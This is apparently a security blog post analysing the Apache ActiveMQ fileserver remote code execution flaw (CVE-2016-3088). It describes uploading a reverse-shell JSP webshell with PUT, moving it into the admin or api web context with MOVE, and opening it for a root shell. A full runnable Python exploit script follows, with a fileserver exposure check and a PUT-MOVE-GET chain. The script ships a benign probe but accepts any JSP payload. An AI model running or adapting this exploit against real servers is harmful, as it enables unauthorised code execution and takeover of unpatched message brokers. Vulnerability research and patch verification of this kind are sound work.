Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016-3088) analysis

1. Vulnerability background:
ActiveMQ is open-source message-oriented middleware under the Apache Software Foundation. Jetty is an open-source servlet container, a Java-based web container that provides the runtime environment for JSP pages and servlets. ActiveMQ 5.0 and later bundle Jetty by default, so once ActiveMQ starts it also serves a web application (the web console) on its own listening port.

On April 14, 2016, security researcher Simon Zuckerbraun disclosed multiple security vulnerabilities in the Apache ActiveMQ Fileserver web application. An attacker can overwrite files of the web applications with malicious code and thereby execute arbitrary code on the affected system (CVE-2016-3088).
Port 8161 is the web console port, and this vulnerability lives in the web console.
The ActiveMQ web console consists of three applications: admin, api and fileserver. admin is the administrator page, api is the API interface, and fileserver is the interface for storing files. admin and api require a login; fileserver does not.
fileserver is a RESTful interface: the files stored in it can be read and written with GET, PUT, DELETE and other HTTP requests. It was designed to make up for the message queue's inability to carry binary files, but it later turned out to be little used and prone to file-operation vulnerabilities.
For that reason the fileserver application is disabled by default in ActiveMQ 5.12.x through 5.13.x (it can be re-enabled in conf/jetty.xml), and from version 5.14.0 onward the fileserver application was removed entirely.

2. Exploitation:
First, use a PUT request to upload a JSP webshell into the fileserver directory.
The JSP uploaded here is a reverse-shell payload generated with msfvenom.
Then use the MOVE method to move the webshell into the admin/ or api/ directory (a relative path can also be used).
Now visit http://your ip:8161/api/ followed by the file name and you will find that your webshell is there (remember that admin and api require a login, as noted above).
Finally, start a listener in Kali and open the webshell in the browser; you get a shell with the privileges of the ActiveMQ process, which in this environment runs as root.
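The PUT / MOVE / GET sequence above, written out as a runnable script. This is an added example and not code from the original post: the host, port, webapps directory, file names and credentials are all assumptions for a lab box you own, and the msfvenom payload is replaced by a harmless JSP probe that only proves the page was compiled and executed. It also includes the non-destructive PUT / GET / DELETE round trip a practitioner would use to confirm that an unauthenticated fileserver is exposed before going any further.

```python
"""
CVE-2016-3088 worked example (added here; not the original post's code).

Assumptions, to be replaced for a real lab target:
  - ActiveMQ web console on 127.0.0.1:8161
  - ActiveMQ installed under /opt/activemq (so webapps live in /opt/activemq/webapps)
  - admin/api login of admin:admin
"""
import base64
import http.client
import posixpath

# Constructed stand-in for the msfvenom JSP payload used in the post.
PROBE_JSP = '<%= "activemq-probe:" + System.getProperty("java.version") %>'


def build_put(name, body):
    """PUT into the unauthenticated fileserver webapp (returns method, path, headers, body)."""
    path = posixpath.join("/fileserver", name)
    headers = {"Content-Type": "application/octet-stream",
               "Content-Length": str(len(body))}
    return "PUT", path, headers, body


def build_move(name, webapps_dir, context, dest_name=None):
    """MOVE the uploaded file into an executable web context (admin/ or api/).

    The fileserver MOVE handler reads the target from the Destination header.
    webapps_dir is the absolute install path on the target and differs per host;
    /opt/activemq/webapps used in the tests is an assumption.
    """
    dest_name = dest_name or name
    dest = "file://" + posixpath.join(webapps_dir, context, dest_name)
    return "MOVE", posixpath.join("/fileserver", name), {"Destination": dest}


def build_get(context, name, credentials=None):
    """GET that triggers the JSP; admin/ and api/ are behind HTTP basic auth."""
    headers = {}
    if credentials:
        token = base64.b64encode(f"{credentials[0]}:{credentials[1]}".encode()).decode()
        headers["Authorization"] = "Basic " + token
    return "GET", posixpath.join("/", context, name), headers


def send(host, port, method, path, headers, body=None):
    """Send one request and return (status, response body)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request(method, path, body=body, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def check_fileserver(host, port, marker="cve-2016-3088-check.txt"):
    """Non-destructive exposure check: PUT a marker, read it back, DELETE it.

    Returns True when an unauthenticated client can write to /fileserver/.
    """
    method, path, headers, body = build_put(marker, b"marker")
    put_status, _ = send(host, port, method, path, headers, body)
    get_status, data = send(host, port, "GET", path, {})
    send(host, port, "DELETE", path, {})
    return put_status < 300 and get_status == 200 and data == b"marker"


def exploit(host, port, webapps_dir, context="admin", name="probe.jsp",
            credentials=None, payload=PROBE_JSP):
    """Upload the JSP, MOVE it into `context`, fetch it; returns statuses and JSP output."""
    method, path, headers, body = build_put(name, payload.encode())
    put_status, _ = send(host, port, method, path, headers, body)
    method, path, headers = build_move(name, webapps_dir, context)
    move_status, _ = send(host, port, method, path, headers)
    method, path, headers = build_get(context, name, credentials)
    get_status, out = send(host, port, method, path, headers)
    return put_status, move_status, get_status, out.decode(errors="replace")


if __name__ == "__main__":
    # Lab target only; every value here is an assumption (see module docstring).
    target = ("127.0.0.1", 8161)
    if check_fileserver(*target):
        print(exploit(*target, "/opt/activemq/webapps",
                      credentials=("admin", "admin")))
    else:
        print("fileserver is not writable without authentication")
```

Running `check_fileserver` first matters on 5.12.x and 5.13.x hosts, where the fileserver is shipped disabled and the PUT simply fails; the `exploit` path is only meaningful when the check returns True. If `exploit` reports a successful PUT and MOVE but a 401 on the final GET, the upload worked and only the admin/api login is missing.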

Origin blog.51cto.com/14259144/2420799